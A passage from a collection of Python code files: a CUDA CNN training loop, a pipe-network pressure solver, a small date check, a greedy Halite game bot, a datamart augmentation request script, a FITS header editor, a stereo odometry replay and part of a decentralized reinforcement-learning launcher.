here!!!\ncnn.cuda()\n\n#训练过程\noptimizer=torch.optim.Adam(cnn.parameters(),lr=LR)\nloss_func=nn.CrossEntropyLoss() #选择误差函数\n\nif __name__ == '__main__':\n for epoch in range(EPOCH):\n for step,(x,y) in enumerate(train_loader):\n\n #!!!cuda在此做了改变!!!\n b_x=Variable(x).cuda()\n b_y=Variable(y).cuda()\n\n output=cnn(b_x)\n loss=loss_func(output,b_y)\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n\n if step%50 == 0:\n test_output=cnn(test_x)\n\n #!!! cuda change here!!!\n pred_y=torch.max(test_output,1)[1].cuda().data\n accuracy = torch.sum(pred_y == test_y).type(torch.FloatTensor) / test_y.size(0)\n print('Epoch: ', epoch, '| train loss: %.4f' % loss.item(), '| test accuracy: %.2f' % accuracy)\n","sub_path":"src/CnnCuda.py","file_name":"CnnCuda.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"639896092","text":"from scipy.optimize import fsolve\r\nimport numpy as np\r\n\r\nfrom PipeClass import Pipe\r\nfrom PumpClass import Pump\r\n\r\n# Solve the pipe network when the supply is a pressure source\r\ndef p1errors(pvals, pipelist, rho, mu, supplyp): # using a pressure source\r\n pressureB, pressureC, pressureD = pvals #Expand pressures\r\n ab, bc, cd, bd, de = pipelist #Expand pipes\r\n\r\n '''\r\n Use the image of the pipe network to derive equations for flow rate at all the nodes\r\n '''\r\n Qab = ab.flow(pressureB - supplyp, rho, mu)\r\n Qbc = bc.flow(pressureC - pressureB, rho, mu)\r\n Qcd = cd.flow(pressureD - pressureC, rho, mu)\r\n Qde = de.flow(0 - pressureD, rho, mu)\r\n Qbd = bd.flow(pressureD - pressureB, rho, mu)\r\n\r\n return [Qab - Qbc - Qbd, #Sum of the flows at node B\r\n Qbc - Qcd, #Sum of the flows at node C\r\n Qcd + Qbd - Qde] #Sum of the flows at Node D\r\n\r\n# Solve the pipe network when the supply is a flow source\r\ndef p2errors(pvals, pipelist,rho,mu,supplyQ): # using a pressure source\r\n pressureA, pressureB, pressureC, pressureD = pvals #Expand pressures\r\n ab, bc, cd, bd, de = pipelist #Expand pipes\r\n\r\n '''\r\n Use the image of the pipe network to derive equations for flow rate at all the nodes\r\n '''\r\n Qab = ab.flow(pressureB - pressureA, rho, mu)\r\n Qbc = bc.flow(pressureC - pressureB, rho, mu)\r\n Qcd = cd.flow(pressureD - pressureC, rho, mu)\r\n Qde = de.flow(0 - pressureD, rho, mu)\r\n Qbd = bd.flow(pressureD - pressureB, rho, mu)\r\n\r\n return [supplyQ - Qab, #Sum of the flows at node A\r\n Qab - Qbc - Qbd, #Sum of the flows at node B\r\n Qbc - Qcd, #Sum of the flows at node C\r\n Qcd + Qbd - Qde] #Sum of the flows at Node D\r\n\r\n# Solve the pipe network when the supply is a pump\r\ndef p3errors(pvals, pipelist, rho, mu, pump): # using a pump\r\n pressureA, pressureB, pressureC, pressureD = pvals #Expand pressures\r\n ab, bc, cd, bd, de = pipelist #Expand pipes\r\n\r\n '''\r\n Use the image of the pipe network to derive equations for flow rate at all the nodes\r\n '''\r\n Qab = ab.flow(pressureB - pressureA, rho, mu)\r\n Qbc = bc.flow(pressureC - pressureB, rho, mu)\r\n Qcd = cd.flow(pressureD - pressureC, rho, mu)\r\n Qde = de.flow(0 - pressureD, rho, mu)\r\n Qbd = bd.flow(pressureD - pressureB, rho, mu)\r\n\r\n return [pump.flow(pressureA) - Qab, #Sum of the flows at node A\r\n Qab - Qbc - Qbd, #Sum of the flows at node B\r\n Qbc - Qcd, #Sum of the flows at node C\r\n Qcd + Qbd - Qde] #Sum of the flows at Node D\r\n\r\ndef main():\r\n rho = 1.94\r\n mu = 0.0000186\r\n eps = 0.00082\r\n\r\n ab = Pipe(4/12, 2500, eps, 'ab')\r\n bc = Pipe(5/12, 3500, eps, 'bc')\r\n cd = Pipe(6/12, 6000, eps, 'cd')\r\n bd = Pipe(8/12, 2000, eps, 'bd')\r\n de = Pipe(8/12, 1500, eps, 'de')\r\n\r\n pipelist = [ab,bc,cd,bd,de]\r\n\r\n #Pressure Source\r\n guess = [1000,1100,1200]\r\n supplyp = 7596.4 #psf or 100 psi\r\n Pvals = fsolve(p1errors, guess, args = (pipelist, rho, mu, supplyp))\r\n\r\n Pvals = fsolve(p1errors, Pvals, args = (pipelist, rho, mu, supplyp))\r\n pb, pc, pd = Pvals\r\n\r\n print('\\nPressures at b, c and d are {:.1f}, {:.1f} and {:.1f}'.format(pb, pc, pd))\r\n\r\n for pipe in pipelist: pipe.display()\r\n\r\n print('Fsolve Errors: ', p1errors(Pvals, pipelist, rho, mu, supplyp))\r\n\r\n #Flow Source\r\n guess = [10000, 1000, 1100, 1200]\r\n supplyQ = 0.54932 #cfm\r\n Pvals = fsolve(p2errors, guess, args=(pipelist, rho, mu, supplyQ))\r\n pa, pb, pc, pd = Pvals\r\n\r\n print('\\nPressures at a, b, c and d are {:.1f}, {:.1f}, {:.1f} and {:.1f}'.format(pa, pb, pc, pd))\r\n for pipe in pipelist: pipe.display()\r\n print('Fsolve Errors: ', p2errors(Pvals, pipelist, rho, mu, supplyQ))\r\n\r\n #Pump Source\r\n pump = Pump([15000, -1820, -12900, -15150]) #create the pump object\r\n\r\n guess = [130, 120, 110, 100]\r\n Pvals = fsolve(p3errors, guess, args=(pipelist, rho, mu, pump))\r\n pa, pb, pc, pd = Pvals\r\n\r\n print('\\nPressures at a, b, c and d are {:.1f}, {:.1f}, {:.1f} and {:.1f}'.format(pa, pb, pc, pd))\r\n for pipe in pipelist: pipe.display()\r\n print('Pump flow and pressure are: {:.3f} and {:.3f}'.format(pump.Q, pump.dp))\r\n print('Fsolve Errors: ', p3errors(Pvals, pipelist, rho, mu, pump))\r\n\r\nmain()\r\n","sub_path":"HW6/PipeNetwork.py","file_name":"PipeNetwork.py","file_ext":"py","file_size_in_byte":4292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"300007417","text":"def Check(year, month, day):\n if (( year >= 1500 and year <= 2020) and\n (month >= 1 and month <= 12) and\n (day >= 1 and day <= 31)):\n \n print(day+1,month, year,sep='-')\n\n\nCheck(2020,10,22)\nCheck(22, 12,22)\n","sub_path":"2 Python Programming Examples on Mathematical Expressions/1 Check Date if valid print incremented Date.py","file_name":"1 Check Date if valid print incremented Date.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"298614264","text":"\"\"\"\nThis bot always attacks as soon as it has a weaker target. Internal sites move towards their\nstrongest neighbour.\n\"\"\"\n\nimport logging\n\nfrom hlt.core import Location, Move\nfrom hlt.messaging import get_init, send_init, get_frame, send_frame\n\nNAME = 'GreedyBot'\n\nlogging.basicConfig(filename='logs/{}.log'.format(NAME.lower()), level=logging.INFO)\nlogger = logging.getLogger(name=NAME)\n\nmyID, gameMap = get_init()\nsend_init(NAME)\n\nwhile True:\n moves = []\n game_map = get_frame()\n\n # Iterate over locations in map.\n for i, row in enumerate(game_map.map):\n for j, site in enumerate(row):\n # If we own this square, make a decision.\n if site[2] == myID:\n # Create a Location object.\n location = Location(row=i, col=j)\n\n # Look at the immediate surroundings.\n friends, neutrals, enemies = game_map.get_neighbours(myID, i, j)\n\n # Check if this is an edge piece.\n if enemies or neutrals:\n # Treat enemies and neutrals same for now.\n enemies.update(neutrals)\n\n # Choose the weakest neighbour.\n weakest_dir = min(enemies, key=lambda x: enemies[x][0])\n\n if enemies[weakest_dir][0] < site[0]:\n # Make a move.\n moves.append(Move(loc=location,\n direction=weakest_dir))\n\n elif site[0] != 0:\n # Choose the strongest friendly neighbour\n strongest_dir = max(friends, key=lambda x: friends[x][0])\n\n # Make a move.\n moves.append(Move(loc=location,\n direction=strongest_dir))\n\n # Send moves to the game.\n send_frame(moves)\n","sub_path":"bots/greedy_bot.py","file_name":"greedy_bot.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"86923415","text":"\"\"\"\nReference:\n - https://vida-nyu.gitlab.io/-/datamart/datamart-api/-/jobs/233008593/artifacts/pages/rest_api.html\n\n- https://datamart.d3m.vida-nyu.org\n\"\"\"\nimport json\nfrom io import BytesIO\nfrom collections import Counter\nimport zipfile\nimport random\nimport requests\nimport json\nimport os\nfrom os.path import abspath, dirname, isdir, isfile, join\n\nCURRENT_DIR = dirname(abspath(__file__))\nINPUT_DIR = join(CURRENT_DIR, 'input')\nOUTPUT_DIR = join(CURRENT_DIR, 'output')\n\n\nurl = 'https://auctus.vida-nyu.org'\n\nsearch_results_fpath = 'output/search_result_example2.json'\n\n\ndef dashes(): print('-' * 40)\ndef msgt(m): dashes(); print(m); dashes()\n\ndef run_checks():\n \"\"\"run some checks\"\"\"\n assert isfile(test_file_to_augment), \\\n 'test file not found: %s' % test_file_to_augment\n\n game_ids = []\n for line in open(test_file_to_augment, 'r').readlines()[1:]:\n items = line.split(',')\n game_ids.append(items[0])\n\n print(len(game_ids))\n\n c = Counter(game_ids)\n print(c.most_common(5))\n\n outlines = ['Medallion_Number,Earnings']\n for val, cnt in c.most_common(20):\n earnings = random.randint(5000, 7500)\n info_line = f'{val},{earnings}'\n outlines.append(info_line)\n #print(info_line)\n\n print('\\n'.join(outlines))\n\ndef run_augment_test():\n \"\"\"Download POST\"\"\"\n\n # Query result\n #\n result_content = open(join(INPUT_DIR, 'nyu_result_aug_01_water.json'), 'r').read()\n\n task_data = json.loads(result_content)\n\n \"\"\"\n \"left_columns\": \"[[1]]\",\n \"right_columns\": \"[[13]]\",\n \"augment_with_dataset\": true,\n \"augment_with_join_pairs\": false,\n \"exact_match\": true\n \"\"\"\n task_data['augmentation'] = {\\\n 'type': 'join',\n 'left_columns': [[1]], #[(1,)], # game id user's dataset\n 'right_columns': [[13]], #[(0,)] # game id in datamart dataset\n }\n\n # syntax check\n #\n #assert json.loads(task_data), 'task_data not valid json'\n\n # Augment url\n #\n augment_url = 'https://auctus.vida-nyu.org/augment'\n\n print('task_data', task_data)\n print('-' * 40)\n print('augment_url', augment_url)\n print('-' * 40)\n\n # TAXI Dataset\n test_file_to_augment = join(INPUT_DIR,\n 'seed_taxi_data.csv',)\n\n data_params = dict(data=open(test_file_to_augment, 'rb'),\n task=json.dumps(task_data),\n )\n\n # Make request\n #\n try:\n response = requests.post(augment_url,\n files=data_params,\n verify=False,\n allow_redirects=True,\n stream=True)\n\n except requests.exceptions.Timeout as err_obj:\n user_msg = ('Request timed out. responded with: %s' % err_obj)\n print(user_msg)\n return\n\n if response.status_code != 200:\n user_msg = (f'Augment failed. Status code:'\n f' {response.status_code}. response: {response.text}')\n print(user_msg)\n return\n\n print('augment success!')\n\n\n data_foldername = join(OUTPUT_DIR, 'augment-results-fifa',)\n if not isdir(data_foldername):\n os.makedirs(data_foldername)\n\n try:\n with zipfile.ZipFile(BytesIO(response.content), 'r') as data_zip:\n data_zip.extractall(data_foldername)\n except RuntimeError as err_obj:\n user_msg = (f'Failed to extract zip to \"{data_foldername}\".'\n f' Error: %s') % (err_obj,)\n print(user_msg)\n\n msgt('files downloaded to %s' % data_foldername)\n\n\nif __name__ == '__main__':\n # run_search()\n # run_checks()\n run_augment_test()\n","sub_path":"dev_scripts/run_augment_test1.py","file_name":"run_augment_test1.py","file_ext":"py","file_size_in_byte":3728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"154537917","text":"from astropy.io import fits \nimport astropy.units as u\nimport time\n\n# get header and data\ncase_name = 'drift' #all_effects_2048 #scao_only_2048\ncontrast = 'ADI'\nmode = 'RAVC'\nif contrast.upper() == 'ADI':\n contrast = contrast.upper()\nelif contrast.lower() == 'raw':\n contrast = contrast.lower()\nscao = 'compass3600s_samp300ms' #'compass600s_samp100ms' #'compass3600s_samp300ms'\nband = 'M'\n#band_bckg = '%s_bckg0'%band\nband_bckg = '%s_bckg0'%band\n#band_bckg = 'L_bckg1'\nfilename = 'cc_%s_dec-2.47_%s_%s_%s_%s.fits'%(scao, band_bckg, mode, case_name, contrast)\n\nprint(filename)\nfits.open(filename)[0].header\nhdu = fits.open(filename)[0]\nhdr = hdu.header\ndata = hdu.data\n\n# define new header elements\n# hdr['bckg'] = False#True\n# hdr['mag'] = None #if bckg is True else None\n# hdr['date'] = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n# hdr['title'] = 'SCAO residuals only (1h, 300ms)'\n# hdr['mode'] = 'CVC'\n# hdr['band'] = 'N2a'#'N1a'#'N2'#'N1'#'M'#'L'\nhdr['lam'] = 3.8128e-06#4.8091E-06#8.6016E-06#1.1236E-05#8.6469E-06#1.1187E-05 #1024 values\n#hdr['lam'] = 1.1219E-05#3.8204e-06#4.7970E-06#8.6313E-06#1.1287E-05#8.6658E-06# #2048 values\n# hdr['diam'] = 37\n\n# change header\nif contrast == 'ADI':\n hdr['ylabel'] = '5-$\\sigma$ sensitivity (contrast)'\nelif contrast == 'raw':\n hdr['ylabel'] = 'Raw contrast'\nhdr['xlabel'] ='Angular separation $[\\lambda/D]$'\nhdr2 = fits.Header({'xlabel':hdr['xlabel'], 'ylabel':hdr['ylabel'], \\\n 'title':hdr['title']})\nhdr2['date'] = (hdr['date'], 'created')\nhdr2['contrast'] = (contrast, 'contrast type: ADI, PCA, raw,...')\nhdr2['mode'] = (mode, 'HCI mode')\nhdr2['band'] = (hdr['band'], 'spectral band')\nhdr2['lam'] = (hdr['lam'], 'wavelength in m')\nhdr2['diam'] = (hdr['diam'], 'pupil diameter in m')\nhdr2['bckg'] = (hdr['bckg'], 'shot noise (bool)')\nhdr2['mag'] = (hdr['mag'], 'star magnitude (if bckg is True else None)')\n\n#hdr2['title'] = 'static NCPA at HSF (>10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (0-0.01Hz) at HSF (>10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (0-0.01Hz) at LSF (<10c/p)'\n#hdr2['title'] = 'quasi-static petal piston (0-0.01Hz) at HSF (<10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (10c/p)'\n#hdr2['title'] = 'quasi-static NCPA (10cpp) + LTF (<0.01Hz, 10nm rms)'\n#hdr2['LABEL4'] = 'LSF (<10cpp) + HTF (>0.01Hz, 10nm rms)'\n#hdr2['LABEL5'] = 'HSF (>10cpp) + HTF (>0.01Hz, 10nm rms)'\n\n\n#hdr2['LABEL1'] = '0 nm rms'\n#hdr2['LABEL2'] = '200 nm rms'\n#hdr2['LABEL3'] = '125 nm rms'\n#hdr2['LABEL4'] = '150 nm rms'\n#hdr2['LABEL5'] = '175 nm rms'\n#hdr2['LABEL6'] = '200 nm rms'\n#hdr2['LABEL7'] = '225 nm rms'\n#hdr2['LABEL8'] = '250 nm rms'\n\n#hdr2['LABEL2'] = 'static NCPA at HSF, 35.9 nm rms'\n#hdr2['LABEL3'] = 'quasi-static NCPA at LSF, 20 nm rms'\n#hdr2['LABEL4'] = 'quasi-static NCPA at HSF, 20 nm rms'\n#hdr2['LABEL5'] = 'dynamic NCPA at all SF, 40 nm rms'\n#hdr2['LABEL6'] = 'all NCPA effects combined'\n\n# hdr2['LABEL2'] = 'pointing jitter 2 mas rms'\n# hdr2['LABEL3'] = 'pointing quasistatics 0.4 mas rms'\n# hdr2['LABEL4'] = 'pupil drift (RAVC) 2% ptv'\n# hdr2['LABEL5'] = 'NCPA + petal piston (see box)'\n# hdr2['LABEL6'] = 'ALL EFFECTS'\n# hdr2['LABEL7'] = 'ALL EFFECTS + 7 misaligned segments'\n\n## edit data\ndata2 = data[0:1,:]\n#data2 = np.vstack((data2, data[-2,:]))\n\n#cube0 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_SCAOonly_raw.fits')\n#cube1 = fits.getdata('cc_raw_L_RAVC_misaligned_segments_7_flower.fits')\n#cube2 = fits.getdata('cc_raw_L_RAVC_pointing_jitter_0.01-1Hz_2.fits')\n#cube3 = fits.getdata('cc_raw_L_RAVC_pointing_quasistatics_0-0.01Hz_0.4.fits')\n#cube4 = fits.getdata('cc_raw_L_RAVC_pupil_drift_RAVC_2.fits')\n##cube5 = fits.getdata('cc_raw_L_RAVC_ncpa+petal_piston_20.fits')\n#cube5 = fits.getdata('cc_raw_L_RAVC_petal_piston_drift_10.fits')\n##cube6 = fits.getdata('cc_raw_L_RAVC_ncpa_lin_drift_ptv_20.fits')\n#cube6 = fits.getdata('cc_raw_L_RAVC_all_ncpa_20191011.fits')\n#cube7 = fits.getdata('cc_raw_L_RAVC_ALL_EFFECTS_20191017.fits')\n\n#cube0 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_SCAOonly_ADI.fits')\n#cube1 = fits.getdata('cc_compass1h_samp300ms_dec-2.47_L_mag6_bckg0_RAVC_all_effects_2.fits')\n#cube2 = fits.getdata('cc_compass3600s_samp300ms_ADI3600s_samp300ms_avg0ms_dec-2.47deg_L_mag6_bckg0_RAVC_71.fits')\n#cube3 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_pointing_quasistatics_0-0.01Hz_ADI.fits')\n#cube4 = fits.getdata('cc_compass1h_samp300ms_dec-2.47_L_mag6_bckg0_RAVC_all_effects_5.fits')\n##cube5 = fits.getdata('cc_raw_L_RAVC_ncpa+petal_piston_20.fits')\n#cube5 = fits.getdata('cc_compass1h_samp300ms_dec-2.47_L_mag6_bckg0_RAVC_all_effects_6.fits')\n##cube6 = fits.getdata('cc_raw_L_RAVC_ncpa_lin_drift_ptv_20.fits')\n#cube6 = fits.getdata('cc_compass3600s_samp300ms_dec-2.47_L6_bckg0_RAVC_20191011_ADI.fits')\n#cube7 = fits.getdata('cc_compass3600s_samp300ms_ADI3600s_samp300ms_avg0ms_dec-2.47deg_L_mag6_bckg0_RAVC_78.fits')\n\nif contrast == 'ADI':\n update_x = True\n# for i in np.arange(3.5,-2,-.5):\n# cube = fits.getdata('cc_%s_dec-2.47_%smag%s_bckg1_CVC_%s.fits'%(scao,band,round(i,1),case_name)).T\n for i in np.arange(1,4,1):\n cube = fits.getdata('cc_%s_dec-2.47_%smag6_bckg0_RAVC_%s_%s.fits'%(scao,band,case_name,i)).T\n # X-axis in lam/D\n if update_x is True:\n lamD2asec = hdr['lam']/hdr['diam']*u.rad.to('arcsec') # lam/D to arcsec\n data2 = cube[4,:]/lamD2asec\n update_x = False\n data2 = np.vstack((data2, cube[1,:]))\n # cube0 = fits.getdata('cc_%s_ADI3600s_samp300ms_avg0ms_dec-2.47deg_%s_mag3.5_bckg1_CVC_cvc_%s.fits'%(scao,band,case_name)).T\n # cube1 = fits.getdata('cc_%s_ADI3600s_samp300ms_avg0ms_dec-2.47deg_%s_mag3_bckg1_CVC_cvc_%s.fits'%(scao,band,case_name)).T\n # cube2 = fits.getdata('cc_%s_ADI3600s_samp300ms_avg0ms_dec-2.47deg_%s_mag2.5_bckg1_CVC_cvc_%s.fits'%(scao,band,case_name)).T\n pass\nelif contrast == 'raw':\n cube = fits.getdata('cc_raw_L_RAVC_SCAO_ONLY_0.fits')\n cube0 = fits.getdata('cc_raw_L_RAVC_ncpa+petal_piston_20191205.fits')\n cube1 = fits.getdata('cc_raw_L_RAVC_ALL_EFFECTS_20191205.fits')\n cube2 = fits.getdata('cc_raw_L_RAVC_ALL_EFFECTS+MIS_SEG_20191205.fits')\n cube3 = fits.getdata('cc_raw_L_RAVC_pointing_quasistatics_0-0.01Hz_0.4.fits')\n cube4 = fits.getdata('cc_raw_L_RAVC_pointing_jitter_0.01-1Hz_2.fits')\n cube5 = fits.getdata('cc_raw_L_RAVC_pupil_drift_RAVC_2.fits')\n pass\n\n\n\nif False:\n data2 = np.vstack((data2, cube0[1,:]))\n data2 = np.vstack((data2, cube1[1,:]))\n data2 = np.vstack((data2, cube2[1,:]))\n data2 = np.vstack((data2, cube3[1,:]))\n data2 = np.vstack((data2, cube4[1,:]))\n data2 = np.vstack((data2, cube5[1,:]))\n data2 = np.vstack((data2, cube6[1,:]))\n data2 = np.vstack((data2, cube7[1,:]))\n data2 = np.vstack((data2, cube8[1,:]))\n\n#data2 = np.vstack((data2, cube1[1,:]))\n#data2 = np.vstack((data2, cube1[1,:]))\n#data2 = np.vstack((data2, cube2[1,:]))\n\n#C = 9.4e-09 # [median(mag=10) - median(no bckg)] / 10^(0.4*mag)\n#data2 = np.vstack((data2, data2[1,:] + C*10**(0.4*5)))\n#data2 = np.vstack((data2, data2[1,:] + C*10**(0.4*7.5)))\n#data2 = np.vstack((data2, data2[1,:] + C*10**(0.4*10)))\n\n\n#data2 = np.vstack((data2, data2[1,:]*C*10**(0.4*7.5)))\n#data2 = np.vstack((data2, data2[1,:]*C*10**(0.4*10)))\n\n\n# save fits file\nhdu = fits.PrimaryHDU(data2, header=hdr2) # select data2 / hdr2\nhdu.writeto(filename, overwrite=True)\nprint('new header')\nfits.open(filename)[0].header\n\n","sub_path":"heeps/contrast/edit_hdu.py","file_name":"edit_hdu.py","file_ext":"py","file_size_in_byte":9635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"11130989","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport cv2 as cv\nimport numpy as np\nimport os\nimport matplotlib.pyplot as plt\nfrom Stereo import Stereo\n\npath = os.path.join(os.getcwd(), \"..\", \"dataset\", \"image_sequences\", \"box\")\nimg = cv.imread(os.path.join(path, '{:06d}.png'.format(0)))\ncount = 1\n\nstereo = Stereo()\nstereo.initialize(img)\n\nx = []\ny = []\n\nposition_figure = plt.figure(1)\nplt.title(\"Map\")\nposition_axes = position_figure.add_subplot(1, 1, 1)\nposition_axes.set_aspect('equal', adjustable='box')\n\nwhile True:\n img = cv.imread(os.path.join(path, '{:06d}.png'.format(count)))\n R, t, _ = stereo.nextFrame(img)\n x.append(t[0])\n y.append(t[1])\n position_axes.scatter(x, y, c=\"blue\", s=10)\n cv.imshow(\"Image\", img)\n count += 1\n if cv.waitKey(1) & 0xFF == ord('q'):\n cv.destroyAllWindows()\n break\n","sub_path":"src/replay.py","file_name":"replay.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"201058112","text":"import argparse\nimport numpy as np\nimport torch\nfrom agents import ActorCritic_BidAgent, SAC_BidAgent\nfrom society import Society, ClonedSociety\nfrom experiment import GridWorldExperiment, TabularDecentralizedLearner, DecentralizedLearner, DecentralizedExperiment\nfrom decentralized_sampler import DecentralizedSampler\n\nfrom starter_code.agent import LiteralAction_Agent, Subpolicy_Agent\nfrom starter_code.configs import env_manager_switch, process_config\nfrom starter_code.env_config import EnvRegistry as ER\nfrom starter_code.log import MultiBaseLogger\nfrom starter_code.multitask import construct_task_progression, default_task_prog_spec\nfrom starter_code.policies import SimpleBetaSoftPlusPolicy, BetaCNNPolicy, DiscretePolicy, DiscreteCNNPolicy\nfrom starter_code.rb import StaticMemory, ExpandedStaticMemory, PathMemory\nfrom starter_code.rl_algs import rlalg_switch\nfrom starter_code.value_function import SimpleValueFn, CNNValueFn, CNNQFn\n\nfrom starter_code.run import BaseLauncher\nfrom starter_code.utils import AttrDict, visualize_parameters\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Decentralized')\n parser.add_argument('--autorm', action='store_true')\n\n # Experiment\n parser.add_argument('--subroot', type=str, default='debug')\n parser.add_argument('--env-name', nargs='+', type=str, default='GW2')\n parser.add_argument('--seed', type=int, default=0)\n parser.add_argument('--alg-name', type=str, default='ppo')\n parser.add_argument('--printf', action='store_true')\n parser.add_argument('--debug', action='store_true')\n parser.add_argument('--cpu', action='store_true')\n parser.add_argument('--expid', type=str, default='9999999')\n\n # Model\n parser.add_argument('--redundancy', type=int, default=2)\n parser.add_argument('--clone', action='store_true',\n help='redundant agents are cloned')\n parser.add_argument('--auctiontype', type=str, default='bb')\n parser.add_argument('--policy', type=str, default='cbeta',\n help='beta | cbeta')\n parser.add_argument('--ado', action='store_true',\n help='agent dropout')\n parser.add_argument('--memoryless', action='store_true')\n\n ##########################################\n parser.add_argument('--doublesampling', action='store_true',\n help='sample redundant agents twice')\n ##########################################\n\n args = parser.parse_args()\n args.hrl = False\n return args\n\n# TODO: update\ndef create_sac_networks():\n # qf1 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim, # shouldbe more explicit about what this should mean\n # )\n # qf2 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim,\n # )\n # target_qf1 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim,\n # )\n # target_qf2 = lambda: FlattenMlp(\n # input_size=obs_dim + args.agent_action_dim,\n # output_size=1,\n # hidden_sizes=args.hdim,\n # )\n\n qf1 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n qf2 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n target_qf1 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n target_qf2 = lambda: CNNQFn(\n state_dim=obs_dim[:-1],\n action_dim=args.agent_action_dim,\n )\n return qf1, qf2, target_qf1, target_qf2\n\n\nclass DecentralizedLauncher(BaseLauncher):\n env_registry = ER() # may be mutable?\n\n @classmethod\n def policy_switch(cls, policy_name, state_dim, args):\n policy = dict(\n beta = lambda: SimpleBetaSoftPlusPolicy(state_dim, args.hdim, 1),\n cbeta = lambda: BetaCNNPolicy(state_dim[:-1], 1)\n )\n return policy[policy_name]\n\n @classmethod\n def experiment_switch(cls, env_name):\n envtype = cls.env_registry.get_env_type(env_name)\n\n experiment = dict(\n tab=GridWorldExperiment,\n gym=DecentralizedExperiment,\n mg=DecentralizedExperiment)\n\n if envtype == 'tab':\n learner = TabularDecentralizedLearner\n elif envtype == 'gym' or envtype == 'mg':\n learner = DecentralizedLearner\n else:\n assert False\n\n # TODO: make this cleaner\n experiment_builder = lambda society, task_progression, rl_alg, logger, device, args: experiment[envtype](\n learner=learner(\n organism=society,\n rl_alg=rl_alg,\n logger=logger,\n device=device,\n args=args,\n ),\n task_progression=task_progression,\n logger=logger,\n args=args,\n )\n return experiment_builder\n\n @classmethod\n def create_organism(cls, device, task_progression, args):\n if args.alg_name in ['ppo', 'vpg', 'a2c']:\n policy = cls.policy_switch(args.policy, task_progression.state_dim, args)\n valuefn = cls.value_switch(task_progression.state_dim, args)\n networks = lambda: dict(\n policy=policy(),\n valuefn=valuefn()\n )\n agent_builder = ActorCritic_BidAgent\n elif args.alg_name in ['sac']: # will add TD3\n\n policy = cls.policy_switch(args.policy, task_progression.state_dim, args) # same\n\n obs_dim = task_progression.state_dim\n args.agent_action_dim = 1 # hacky for target_entropy\n if not task_progression.is_disc_action:\n raise NotImplementedError('make sure target_entropy is set correctly')\n\n qf1, qf2, target_qf1, target_qf2 = create_sac_networks()\n\n networks = lambda: dict(\n policy=policy(),\n qf1=qf1(),\n qf2=qf2(),\n target_qf1=target_qf1(),\n target_qf2=target_qf2())\n agent_builder = SAC_BidAgent\n else:\n assert False\n\n agents, unique_agents = cls.create_agents(\n agent_builder=agent_builder, \n networks=networks, \n task_progression=task_progression,\n redundancy=args.redundancy,\n args=args, \n device=device)\n\n organism = Society(\n agents=agents, \n unique_agents=unique_agents,\n device=device,\n args=args)\n\n return organism\n\n @classmethod\n def create_transformation_builder(cls, state_dim, action_dim, args):\n transformation_builder = lambda id_num: LiteralAction_Agent(id_num)\n return transformation_builder\n\n @classmethod\n def create_cloned_agents(cls, agent_builder, networks, transformation_builder, num_primitives, redundancy, args, device):\n agents = []\n unique_agents = []\n\n replay_buffer = lambda: PathMemory(\n max_replay_buffer_size=args.max_buffer_size*redundancy)\n for k in range(len(args.parents)):\n print('new parent')\n for i in range(num_primitives):\n # same networks\n print('new network')\n agent_networks = networks()\n agent_replay_buffer = replay_buffer()\n transformation = transformation_builder(i)\n\n for j in range(redundancy):\n print('new clone')\n # because winner % action_dim!\n # NOTE that we cannot change this unless we change the modulo in indespensible_learnable_active_agents in auction.py\n id_num = i + j*num_primitives + k*(num_primitives*redundancy)\n agent = agent_builder(\n id_num=id_num,\n transformation=transformation,\n networks=agent_networks, # these are cloned!\n replay_buffer = agent_replay_buffer,\n args=args).to(device)\n agents.append(agent)\n if j == 0:\n unique_agents.append(agent) # or you can tag the agent as \"canoncical\"\n print('k: {} i: {} j: {} id_num: {}'.format(k, i, j, id_num))\n return agents, unique_agents\n\n @classmethod\n def create_uncloned_agents(cls, agent_builder, networks, transformation_builder, num_primitives, redundancy, args, device):\n agents = []\n replay_buffer = lambda: PathMemory(max_replay_buffer_size=args.max_buffer_size)\n for k in range(len(args.parents)):\n print('new parent')\n for i in range(num_primitives):\n transformation = transformation_builder(i) # the bidders are uncloned, but the transformations are\n for j in range(args.redundancy):\n print('new network')\n # NOTE that we cannot change this unless we change the modulo in indespensible_learnable_active_agents in auction.py\n id_num = i + j*num_primitives + k*(num_primitives*redundancy)\n agent = agent_builder(\n id_num=id_num,\n transformation=transformation,#transformation_builder(i),\n networks=networks(),\n replay_buffer = replay_buffer(),\n args=args).to(device)\n agents.append(agent)\n print('k: {} i: {} j: {} id_num: {}'.format(k, i, j, id_num))\n\n return agents, agents\n\n @classmethod\n def create_agents_generic(cls, 